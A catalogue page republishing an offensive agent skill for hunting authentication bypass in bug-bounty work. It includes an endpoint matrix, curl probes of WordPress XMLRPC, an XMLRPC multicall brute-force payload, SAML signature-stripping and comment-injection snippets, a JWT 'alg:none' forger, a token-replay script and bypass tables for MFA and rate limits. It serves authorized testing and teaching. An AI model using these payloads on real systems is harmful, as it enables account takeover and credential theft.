Agent skill

Hunt Auth Bypass

by sickn33 in sickn33/agentic-awesome-skills

Hunting skill for auth bypass vulnerabilities. An agent skill from sickn33/agentic-awesome-skills.

MITAuto-check passedBackend & APIs

Install Hunt Auth Bypass

skills CLI
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-auth-bypass -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install sickn33/agentic-awesome-skills hunt-auth-bypass --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-auth-bypass .claude/skills/hunt-auth-bypass && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-auth-bypass
GitHub stars
47k
Used in
1 other repo
Token cost
~6.6k tokens
SKILL.md length
2,716 words
Files
2 (incl. references)
Skills in repo
1,497
Repo updated
First seen
Licence
MIT

At a glance

Hunting skill for auth bypass vulnerabilities. An agent skill from sickn33/agentic-awesome-skills.

  • Works in 8 steps: Map all authentication entry points → Identify the auth mechanism per entry… → Test XMLRPC independently of SSO → …
  • Backend & APIs work in your project
  • SKILL.md covers Crown Jewel Targets, Attack Surface Signals, Step-by-Step Hunting Methodology and Legacy-Protocol Matrix (Probe…, plus 9 more sections
  • Calls curl

What it does

Hunt Auth Bypass is an agent skill from sickn33/agentic-awesome-skills. Hunting skill for auth bypass vulnerabilities.

Its SKILL.md is about 6.6k tokens, which your agent loads only when the skill is triggered. The skill folder holds 2 other files, including reference files (for example `references/details.md`). Compatibility notes: Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not…

It sits in Backend & APIs. The repository describes itself as: AAS Core is the local, agent-first control plane for complete catalog discovery, agent-owned selection, stack validation, and planning, backed by 2,400+ agentic skills. Includes… The licence is MIT.

When your agent uses it

  • Backend & APIs work in your project

Example prompts

  • “/hunt-auth-bypass”

Requirements

  • Python 3
  • Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

Workflow steps

8 steps, taken from the first numbered list in SKILL.md.

  1. Map all authentication entry points
  2. Identify the auth mechanism per entry point
  3. Test XMLRPC independently of SSO
  4. Enumerate SAML implementation
  5. Test cross-portal session/token reuse
  6. Fuzz auth parameters
  7. Check redirect and state parameters
  8. Verify impact by escalating privileges

What it can do on your machine

Read from SKILL.md and the folder at commit b84d35a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • hackerone.com
    • github.blog
    • projectdiscovery.io
    • blog.intothesymmetry.com
    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

    From compatibility in the SKILL.md frontmatter.

Context cost

Hunt Auth Bypass loads about 6.6k tokens when it runs, and up to ~8.7k if it reads all its reference files. Until then it costs about 16 tokens; SKILL.md has 2,716 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~16
When it runs · the whole SKILL.md, loaded when a task matches
~6.6k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~8.7k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from sickn33/agentic-awesome-skills at commit b84d35a, republished under its MIT licence (© sickn33). 2,716 words, ~6,635 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-auth-bypass/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.
name
hunt-auth-bypass
description
Hunting skill for auth bypass vulnerabilities.
compatibility
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
category
security
risk
offensive
source
https://github.com/elementalsouls/Claude-BugHunter
source_repo
elementalsouls/Claude-BugHunter
source_type
community
date_added
2026-09-20
license
MIT
license_source
https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE
sources
github, hackerone_public, github_security_lab, projectdiscovery_research
report_count
12

⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.

Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:

  1. Ask the user to state the exact target URL, IP, account, or resource.
  2. Ask the user to confirm written authorization and the permitted scope.
  3. Show the exact command(s) and explain their expected effect.
  4. Wait for explicit confirmation in the current conversation.

Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.

Crown Jewel Targets

Auth bypass is consistently one of the highest-paying vulnerability classes in bug bounty because it directly violates the most fundamental security control. High-value targets include:

  • SSO/SAML implementations at enterprise SaaS companies (Slack, Okta, OneLogin integrations) — payouts regularly in the $5K–$25K+ range
  • Admin panels and partner/internal portals — subdomain-separated admin surfaces like partners.shopify.com, admin.company.com
  • Third-party auth plugin integrations — WordPress plugins (OneLogin, WP-SAML-Auth), Drupal SSO modules, any CMS with pluggable auth
  • XMLRPC endpoints on WordPress — often forgotten, bypasses standard WP auth flows entirely
  • OAuth callback flows — state parameter mishandling, redirect_uri mismatches
  • API authentication layers — especially where auth was bolted on after the fact

Asset priority: Targets with federated identity (SAML, OAuth, OIDC) connected to large user populations. Partner/reseller portals are particularly juicy because they often have elevated permissions and less security scrutiny than the main product.


SSH certificate-authority trust forgery (Git-hosting / enterprise platforms)

When an org or instance registers an SSH certificate authority, cert principals may not be bound server-side to the requesting identity — a member can mint a cert asserting another user's principal and authenticate as them (e.g. modify another user's resource given only its URL). Add SSH-CA trust to the auth-surface list on Git-hosting targets; niche/platform-specific. Disclosed: reports/1901040.

Attack Surface Signals

URL patterns to hunt:

/xmlrpc.php
/wp-login.php
/saml/
/sso/
/auth/saml/callback
/oauth/callback
/partners.*
/admin.*
/?wc-api=
/api/v*/auth
/login?redirect=
/accounts/login

Response headers signaling SSO:

X-Frame-Options: SAMEORIGIN (common on SSO portals)
Set-Cookie: SAMLResponse=
Location: https://idp.company.com/saml
WWW-Authenticate: Bearer realm="partners"

JS patterns indicating federated auth:

javascript
// Look for in page source
samlRequest
RelayState
SAMLResponse
onelogin
shibboleth
okta
passport.js authenticate

Tech stack signals:

  • WordPress + any SSO plugin → check XMLRPC separately
  • Shopify Partner API exposure → cross-tenant privilege escalation risk
  • Any app advertising "SSO enabled" or "Login with [Enterprise IdP]"
  • Separate subdomains for admin/partner that share session cookies with main domain
  • Applications using SimpleSAMLphp, ruby-saml, python-saml

Burp passive scan triggers:

  • SAMLResponse in any POST body
  • openid_connect or id_token in responses
  • Cookie domains set to .company.com (wildcard)

Step-by-Step Hunting Methodology

  1. Map all authentication entry points

    • spider the target for every login surface: main login, admin login, API login, partner portal, mobile API endpoints
    • check robots.txt, JS files, and the wayback machine for forgotten endpoints like /xmlrpc.php
  2. Identify the auth mechanism per entry point

    • Is it forms-based, SAML, OAuth, API key, session token?
    • For WordPress: always probe /xmlrpc.php even if the main login is SSO-protected
  3. Test XMLRPC independently of SSO

    • If site uses SSO (e.g., OneLogin), manually POST to /xmlrpc.php
    • XMLRPC uses WordPress-native credentials, not SSO — test with system.listMethods first, then wp.getUsersBlogs
  4. Enumerate SAML implementation

    • Capture a valid SAMLResponse via Burp
    • Decode the Base64 payload, inspect the XML
    • Test signature stripping, comment injection, and XML wrapping attacks
    • Test if SP validates the signature at all (send unsigned assertion)
  5. Test cross-portal session/token reuse

    • Log into partners.shopify.com type portals
    • Attempt to use the issued token/cookie against the main admin portal
    • Look for shared cookie domains, shared JWT secrets, or API tokens that work across contexts
  6. Fuzz auth parameters

    • Null/empty passwords, password[]=array, SQL in username field
    • Try admin/admin, test/test on staging subdomains
    • Modify role, is_admin, user_type in JWTs (none algorithm, weak secret)
  7. Check redirect and state parameters

    • Does removing state from OAuth break anything?
    • Can you change redirect_uri to an open redirect target?
    • Does the RelayState in SAML get validated?
  8. Verify impact by escalating privileges

    • Don't stop at login — prove you can access admin functions, other users' data, or sensitive configuration
    • Screenshot the highest-privilege action you can perform

Legacy-Protocol Matrix (Probe These First on Any Custom-Branded Login)

When a target has a custom, branded login UI (e.g. customlogin.aspx, /auth/signin, /account/login), always probe the platform's legacy protocol endpoints with native credentials in parallel. These endpoints frequently outlive the custom UI's protections and accept native credentials with NO rate limit, NO MFA challenge, NO CAPTCHA, NO anti-automation. This is the WordPress XMLRPC pattern generalised across CMS / portal / framework stacks.

Target techLegacy endpoint(s) to probeNative-cred bypass surface
WordPress/xmlrpc.php (system.listMethods, wp.getUsersBlogs, system.multicall)Native WP user/pass; bypasses SSO, MFA, IP-allow rules on /wp-login.php
WordPress (REST)/?rest_route=/wp/v2/users, /wp-json/wp/v2/usersUser enumeration anonymously even when login page is hardened
SharePoint (any version)/_vti_bin/Authentication.asmx (Mode + Login SOAP ops)Native Forms-auth credential; FedAuth cookie returned; no rate limit on this endpoint observed on SP2013 farms — this is the canonical SP equivalent of the WP XMLRPC bypass
SharePoint legacy/_vti_bin/_vti_aut/author.dll, /_vti_bin/_vti_adm/admin.dll, /_vti_bin/owssvr.dllFrontPage RPC; sometimes still wired to credential validators
SharePoint REST/_api/contextinfo (POST), /_api/$metadataAnonymous FormDigest issuance; full API surface enumeration
Atlassian (Jira / Confluence)/rest/auth/1/session (basic-auth), /rest/api/2/myself, legacy /rest/api/1.0/Native credentials accepted on /rest/auth/1/session even when Atlassian Crowd / Atlassian Access SSO is enforced on the UI
Drupal/jsonapi/, /user/login?_format=jsonJSON POST endpoint that accepts native passwords; separate from SSO middleware
Drupal (D7 legacy)/?q=user/login, /services/, /rest/Older REST modules with independent auth
Joomla/administrator/index.php?option=com_login, /api/index.php/v1/usersNative Joomla credentials accepted on admin entry independent of any front-site SSO
Exchange / OWA/EWS/Exchange.asmx, /Autodiscover/Autodiscover.xml, /Microsoft-Server-ActiveSyncNTLM / Basic; bypasses OWA UI restrictions (MFA, IP-allow). The classic CVE-2020-0688 / CVE-2021-26855 surface
Citrix NetScaler/vpn/index.html, /cgi/login, /nf/auth/doAuthentication.doNative AD credentials; independent of MFA wrappers
F5 BIG-IP/mgmt/tm/util/bash, /tmui/login.jspNative admin credentials
Generic ASP.NET app*.asmx?WSDL, *.svc?WSDL, trace.axd, elmah.axd, .discoFind every web service; many take credentials independently of the WebForms login
Spring Boot/actuator/*, /management/*, /api/v1/auth/login, /api/v1/swagger-uiActuator endpoints sometimes anonymously enumerable
Jenkins/jnlpJars/jenkins-cli.jar, /script, /manage, /computer/(master)/scriptAPI tokens + native auth
GitLab/api/v3/* (deprecated but still on old installs), /api/v4/users, /api/v4/projectsPersonal Access Tokens with looser scoping than UI session
TeamCity/app/rest/users, /login.html?username=&password= (GET-form-login)Native admin credentials
Apache Tomcat/manager/html, /host-manager/html, /manager/text/listNative Tomcat realm credentials independent of any front auth
WebLogic/console/login/LoginForm.jsp, /wls-wsat/*Native admin
Oracle EBS / PeopleSoft/OA_HTML/AppsLogin, /psp/*/?cmd=loginNative ERP credentials

How to use:

  1. Identify the tech stack from headers + paths (use hunt-misc Attack Surface Signals).
  2. Find the row above that matches.
  3. Probe the legacy endpoint anonymously to confirm it's reachable and not 403/404.
  4. Test with synthetic credentials to confirm it accepts native credential format and returns differential responses (success vs failure).
  5. Verify there is no rate limit, no lockout, no CAPTCHA — burst 10 requests at the same user, confirm uniform timing.
  6. Report as Critical / High depending on chain to ATO: an anonymous + unlimited credential brute-force endpoint is consistently Critical on bug-bounty programs.

Lesson from a authorized engagement: A an enterprise dealer portal on SharePoint 2013 had a custom branded customlogin.aspx. The hunt-auth-bypass skill was loaded but the matrix above did not exist in this document — and the WordPress XMLRPC pattern was not connected to the SharePoint equivalent. /_vti_bin/Authentication.asmx was reachable anonymously, accepted unlimited credential attempts with no rate limit and no lockout, and was the highest-impact finding in the engagement. Walking this matrix on the first pass would have surfaced it immediately.


Payload & Detection Patterns

XMLRPC auth probe (bypasses SSO):

bash
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>'

# If 200 with method list → XMLRPC is enabled, test auth:
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>admin</string></value></param>
    <param><value><string>password</string></value></param>
  </params>
</methodCall>'

SAML signature stripping (send unsigned assertion):

python
import base64, re

# Decode captured SAMLResponse
saml_b64 = "BASE64_FROM_BURP"
saml_xml = base64.b64decode(saml_b64).decode()

# Strip the Signature element entirely
stripped = re.sub(r'<ds:Signature.*?</ds:Signature>', '', saml_xml, flags=re.DOTALL)

# Re-encode and submit
print(base64.b64encode(stripped.encode()).decode())

SAML XML comment injection (username confusion):

xml
<!-- Original NameID -->
<NameID>attacker@evil.com</NameID>

<!-- Injected to confuse parser -->
<NameID>attacker@evil.com<!---->.victim@company.com</NameID>

<!-- Or namespace confusion -->
<NameID xmlns:evil="http://evil.com">victim@company.com</NameID>

Partner/cross-portal token reuse test:

bash
# Get token from partner portal
TOKEN=$(curl -s -X POST https://partners.target.com/login \
  -d 'email=attacker@test.com&password=pass' \
  -c cookies.txt | grep -o 'token=[^;]*')

# Replay against admin portal
curl -s https://admin.target.com/dashboard \
  -H "Authorization: Bearer $TOKEN" \
  -H "Cookie: $TOKEN"

JWT none algorithm attack:

python
import base64, json

header = base64.b64encode(json.dumps({"alg":"none","typ":"JWT"}).encode()).decode().rstrip('=')
payload = base64.b64encode(json.dumps({"user_id":1,"role":"admin","email":"victim@company.com"}).encode()).decode().rstrip('=')
token = f"{header}.{payload}."
print(token)

Grep patterns for auth bypass surface:

bash
# Find XMLRPC in scope
grep -r "xmlrpc" scope_urls.txt

# Find SSO indicators in JS
grep -rE "(SAMLResponse|samlRequest|RelayState|onelogin|shibboleth)" *.js

# Find partner/admin subdomains
subfinder -d target.com | grep -E "(admin|partner|internal|sso|auth|login)"

Common Root Causes

  1. SSO bypasses local auth entirely at the UI layer, but not at the API layer — developers disable the login form but forget that API endpoints (/xmlrpc.php, REST API, mobile API) have their own auth handlers that still accept native credentials.

  2. SAML signature validation is skipped or optional — library defaults often don't enforce signature checking; developers use wantAssertionsSigned: false or fail to configure the IdP certificate correctly.

  3. Shared session infrastructure across different trust levels — partner portals and admin portals reuse the same session cookie or JWT secret because they're built on the same internal framework, assuming access control at the application layer is sufficient.

  4. Trust inheritance in multi-tenant architectures — a token issued in a lower-privilege context (partner, reseller) is accepted in a higher-privilege context because the verification only checks signature validity, not the issuance context.

  5. Plugin/module auth is independent of application auth — every WordPress plugin that handles auth (contact forms, REST API extensions, WooCommerce) may implement its own auth handler inconsistently with the main site's SSO.

  6. XML parsing inconsistencies — different XML parsers (used by SP vs. IdP) handle comments, namespaces, and whitespace differently, enabling confusion attacks where the signed content differs from the evaluated content.


Bypass Techniques

DefenseBypass
SSO enforced on login pageProbe alternate entry points: XMLRPC, REST API, mobile API, legacy endpoints
SAML signature validationXML comment injection, namespace wrapping, signature wrapping (XSW), remove signature entirely
IP allowlisting on admin portalUse partner portal token if it shares auth backend
Rate limiting on loginXMLRPC allows credential stuffing via system.multicall — batches hundreds of auth attempts in one request
CSRF token on login formSAML flow is POST-based cross-origin by design; no CSRF token needed on /saml/callback
JWT signature validationalg: none, key confusion (RS256 → HS256 with public key as secret), brute-force weak secrets
Separate session stores per portalCheck if cookie domain is .target.com (wildcard) — cookie bleeds between subdomains
MFA on primary loginIf SAML SP doesn't enforce MFA at the assertion level and accepts pre-auth assertions, MFA can be skipped

XMLRPC multicall for mass auth bypass:

xml
<methodCall>
  <methodName>system.multicall</methodName>
  <params><param><value><array><data>
    <value><struct>
      <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
      <member><name>params</name><value><array><data>
        <value><string>admin</string></value>
        <value><string>password1</string></value>
      </data></array></value></member>
    </struct></value>
    <!-- repeat for each credential pair -->
  </data></array></value></param></params>
</methodCall>

Show full SKILL.md (1,136 more words)Show less

Gate 0 Validation

Before writing any report, answer these three questions:

  1. What can the attacker DO right now? Must be: authenticate as another user OR authenticate without valid credentials OR elevate to admin/privileged role. "Partial information disclosure" is not auth bypass.

  2. What does the victim LOSE? Must identify a concrete asset: account takeover of specific user, access to all admin functions, ability to read/modify other tenants' data, or access to privileged APIs. Abstract "security control bypass" without impact is not sufficient.

  3. Can it be reproduced in 10 minutes from scratch? You must be able to: (a) start from a fresh browser/session, (b) follow your exact steps, and (c) arrive at authenticated access to a protected resource. If reproduction requires special preconditions you can't re-create (a specific victim's active session, timing windows), the report needs more work.


Real Impact Examples

Scenario 1 — SSO Enforcement Bypassed via Forgotten Protocol Endpoint A large ride-sharing company enforced SSO (via OneLogin) on all WordPress-based internal/public properties. The XMLRPC endpoint (/xmlrpc.php) remained active and accepted WordPress-native credentials entirely independent of the SSO flow. An attacker with any valid WP-native credentials (obtained via credential stuffing or from a previous breach) could authenticate directly through XMLRPC, bypassing MFA, SSO policies, and IP restrictions enforced on the main login form. Impact: Full authenticated access to all WordPress functions available to that user role, including content management and potentially admin functions.

Scenario 2 — SAML Assertion Forgery via Signature Validation Failure A major enterprise communication platform's SAML SP implementation failed to properly validate assertion signatures in specific edge cases. By manipulating the XML structure of a captured SAMLResponse (specifically through comment injection or namespace prefix attacks), an attacker could modify the NameID value to impersonate any user in an organization — including workspace administrators — without possessing that user's credentials or private key material. Impact: Complete account takeover of any user within a SAML-enabled organization; attacker gains access to all messages, files, and integrations in the workspace.

Scenario 3 — Cross-Portal Privilege Escalation via Shared Auth Backend An e-commerce platform's partner/reseller portal issued authentication tokens that were validated by the same backend service as the merchant admin portal. A partner-level account (lower trust, external-facing) could use its issued credentials or tokens to authenticate directly against admin-tier API endpoints, bypassing the merchant onboarding and permission assignment flow. Impact: A malicious partner could access any merchant's admin panel, modify store configurations, exfiltrate customer PII and payment data, or install malicious scripts — affecting thousands of merchant storefronts.


Disclosed Report Citations (Backfill +8 — 2016-2025)

The following real, verified bug-bounty / coordinated-disclosure cases extend this skill. Spans 4 SAML subclasses, 4 JWT subclasses, 1 legacy-protocol (XMLRPC), and 2 partner-portal cross-domain reuse patterns.

  1. GitHub Enterprise Server — SAML XSW via parser differential (CVE-2025-25291/25292) (H1 #2579939 · Blog)

    • Subclass: SAML signature stripping / XSW (parser-differential variant)
    • Payload: signed SAML response; inject a sibling <Assertion> so REXML (signature-checker) and Nokogiri (business-logic reader) resolve different nodes via the same XPath. Signature validates against benign node; SP consumes attacker-controlled <NameID>admin@target</NameID>
    • Root cause: two XML parsers used for verification vs consumption return different elements for the same XPath
    • Year: 2025 — GitHub Security Lab bounty (program max class, internally rated Critical)
  2. GitHub Enterprise — SAML signature bypass on encrypted assertions (CVE-2024-4985) (H1 #2475347 · ProjectDiscovery advisory)

    • Subclass: SAML signature stripping (XSW family) when encrypted-assertions feature enabled
    • Payload: forge SAML response with attacker-controlled assertion; exploit improper signature verification on the encrypted-assertion code branch; provision arbitrary user including site_admin
    • Root cause: improper cryptographic signature verification on the encrypted-assertion code branch
    • Year: 2024 — bounty undisclosed, CVSS 10.0
  3. Uber — SAML auth bypass on uchat.uberinternal.com (H1 #223014)

    • Subclass: SAML signature stripping / improper assertion verification (OneLogin SP-side)
    • Payload: replay/modify SAML assertion with forged NameID; SP did not strictly validate signature scope, so attacker-controlled assertion accepted, granting OneLogin SSO session to internal chat
    • Root cause: improper SAML signature verification on SP implementation
    • Year: 2017 — $8,500
  4. Uber — OneLogin SSO bypass via WordPress XMLRPC (H1 #138869)

    • Subclass: WordPress XMLRPC bypassing SSO (legacy-auth path not gated) — canonical Legacy-Protocol Matrix case
    • Payload: OneLogin plugin auto-created WP users with literal password @@@nopass@@@. SSO plugin blocked wp-login.php only. POST xmlrpc.php with wp.getUsersBlogs + known shared password → authenticated as any previously-SSO'd user
    • Root cause: SSO enforcement applied at one auth surface (wp-login) but legacy XML-RPC path retained password auth with a guessable shared password
    • Year: 2016 — $7,000
  5. Slack — SAML "confused-deputy" assertion reuse (Writeup)

    • Subclass: partner-portal / cross-IdP assertion reuse (audience-restriction not validated)
    • Payload: take an old expired GitHub-signed SAML assertion (different audience, different subject) → present to Slack ACS → Slack logs attacker in as the asserted username
    • Root cause: no audience-restriction nor freshness check; trust extended across IdPs
    • Year: 2017 — $3,000
  6. HackerOne — SAML signup domain enforcement bypass via control characters (H1 #2101076)

    • Subclass: partner-portal / SAML domain-binding bypass via unicode control characters
    • Payload: new user sign-up at SAML-enforced org; append trailing control character (e.g., \r, ) to email → domain comparison normalises away, signup proceeds → unauthorised access to the org
    • Root cause: inconsistent unicode/control-char normalisation between domain check and identity write
    • Year: 2024 — bounty awarded (amount undisclosed)
  7. 8x8 / Jitsi-Meet — JWT alg-confusion (asymmetric verifier accepts symmetric alg) (H1 #1210502)

    • Subclass: JWT alg-confusion (RS256 → HS256 using public key as HMAC secret)
    • Payload: server publishes RS256 verification public key. Send a token with header {"alg":"HS256"} signed with that public key as the HMAC secret → Prosody module validates and admits attacker into authenticated/moderator room
    • Root cause: verifier did not enforce alg=RS256; allowed symmetric algorithm using the public key as shared secret
    • Year: 2021 — bounty undisclosed
  8. Argo CD (Internet Bug Bounty) — JWT audience claim not validated (CVE-2023-22482) (H1 #1889161)

    • Subclass: token-scope / audience check at issuance not at use (cross-audience token confusion)
    • Payload: obtain any RS256-signed token signed by the cluster's OIDC issuer but minted for a different aud (e.g., kubernetes) → present it as bearer to Argo CD API → API treats it as valid because it accepted the issuer's signature and skipped aud enforcement
    • Root cause: aud claim not enforced; signature-trust extended across audiences
    • Year: 2023 — $2,400 via IBB

Contents

When to Use

  • You have explicit, written authorization to assess the target in scope, and the task matches this skill's vulnerability class or technique within a bug-bounty or penetration-test engagement.
  • You need the recon, exploitation, or validation workflow described below — executed strictly inside the approved scope.

Limitations

  • Authorized scope only: the confirmation gate above is mandatory before any probing, exploitation, or credential-access command.
  • Docs-only import: upstream helper scripts, commands, engine, and research assets are not bundled; reinstall tooling from the source repo when needed.
  • Validate every finding (see triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.
Example
bash
# Read-only first step; confirm scope before anything active.
cat scope.txt  # target list from the authorized engagement brief

Adapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.

© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 1 other file (references) in skills/hunt-auth-bypass of sickn33/agentic-awesome-skills.

  • SKILL.md
  • references/details.md

Open the folder on GitHubat commit b84d35a

Used in 1 other repository

We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Hunt Auth Bypass next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Auth Bypass compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Auth Bypass this skillsickn33/agentic-awesome-skills47k1 repos~6.6kAutomated safety check: PassMIT
Security Reviewdoorkeeper-gem/doorkeeper5.5k—~1.4kAutomated safety check: PassMIT
Project Securityjohnku2011/boilerplates-with-ai-skills240—~650Automated safety check: PassMIT
Ton Vulnerability Scannertrailofbits/skills7.5k—~3.8kAutomated safety check: PassCC-BY-SA-4.0
Sast JWTutkusen/sast-skills1.3k—~6kAutomated safety check: PassMIT
Implementing Device Posture Assessment In Zero Trustmukul975/Anthropic-Cybersecurity-Skills34k—~4.1kAutomated safety check: PassApache-2.0

Similar skills

  • Security Review

    doorkeeper-gem/doorkeeper

    Verify that code changes do not introduce OAuth security vulnerabilities.

    5.5k GitHub stars~1.4k tokensUpdated yesterday
    Backend & APIsAuto-check passed
  • Project Security

    johnku2011/boilerplates-with-ai-skills

    A skill your agent uses when reviewing security-sensitive code paths — check auth, secrets, input validation, dependency risk, and data exposure before shipping.

    240 GitHub stars~650 tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed
  • Ton Vulnerability Scanner

    trailofbits/skills

    Official

    Scans TON (The Open Network) smart contracts for 3 critical vulnerabilities including integer-as-boolean misuse, fake Jetton contracts, and forward TON without gas checks.

    7.5k GitHub stars~3.8k tokensUpdated yesterday
    Backend & APIsAuto-check passed
  • Sast JWT

    utkusen/sast-skills

    Detect insecure JWT (JSON Web Token) implementations in a codebase using a two-phase approach: first map all JWT issuance and verification sites to understand the token lifecycle and signing…

    1.3k GitHub stars~6k tokensUpdated 6 mo ago
    Backend & APIsAuto-check passed
  • Implementing Device Posture Assessment In Zero Trust

    mukul975/Anthropic-Cybersecurity-Skills

    Implements device posture assessment as a zero trust access control by integrating endpoint health signals from CrowdStrike ZTA, Microsoft Intune, and Jamf into conditional access policies that…

    34k GitHub stars~4.1k tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed
  • Audit Recon

    ccashwell/evm-cortex

    A skill your agent uses when performing initial audit reconnaissance.

    131 GitHub stars~1.5k tokensUpdated 11 days ago
    Backend & APIsAuto-check passed

More from sickn33/agentic-awesome-skills

All 1,497 skills in this repo
  • Liuguang Banlan UI

    sickn33/agentic-awesome-skills

    Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • User Thoughts Memory

    sickn33/agentic-awesome-skills

    Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • Using LWC Memory and Graphs

    sickn33/agentic-awesome-skills

    Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.

    47k GitHub starsUsed in 1 repo~2k tokens
    Auto-check passed
  • Find Complementary Founders

    sickn33/agentic-awesome-skills

    Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.

    47k GitHub starsUsed in 1 repo~4.8k tokens
    Auto-check passed
  • Whatsapp Cloud API

    sickn33/agentic-awesome-skills

    Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.

    47k GitHub starsUsed in 2 repos~4.5k tokens
    Auto-check passed
  • Cline Pilot

    sickn33/agentic-awesome-skills

    Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.

    47k GitHub starsUsed in 1 repo~4.6k tokens
    Auto-check passed

Questions about Hunt Auth Bypass

What does Hunt Auth Bypass do?

Hunting skill for auth bypass vulnerabilities. An agent skill from sickn33/agentic-awesome-skills. Hunt Auth Bypass is an agent skill from sickn33/agentic-awesome-skills. Hunting skill for auth bypass vulnerabilities.

When should I use Hunt Auth Bypass?

Hunt Auth Bypass fits situations like: backend & APIs work in your project.

How do I install Hunt Auth Bypass in Claude Code?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-auth-bypass -a claude-code`. Or copy the skill folder (skills/hunt-auth-bypass in sickn33/agentic-awesome-skills) into .claude/skills/hunt-auth-bypass in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Auth Bypass in Codex?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-auth-bypass -a codex`. Or copy the skill folder (skills/hunt-auth-bypass in sickn33/agentic-awesome-skills) into .agents/skills/hunt-auth-bypass in your project. Codex loads it when a task matches its description.

Can I use Hunt Auth Bypass in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-auth-bypass -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-auth-bypass, .gemini/skills/hunt-auth-bypass, .github/skills/hunt-auth-bypass and .opencode/skills/hunt-auth-bypass in your project.

What does Hunt Auth Bypass need to run?

Going by SKILL.md and its folder, Hunt Auth Bypass needs the command-line tools its instructions call (curl). Our summary lists: Python 3. Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..

Does Hunt Auth Bypass access the network?

SKILL.md names 5 domains. As links in the text: hackerone.com, github.blog, projectdiscovery.io, blog.intothesymmetry.com and github.com. This is read from the text; nothing was executed.

Is Hunt Auth Bypass safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Hunt Auth Bypass use?

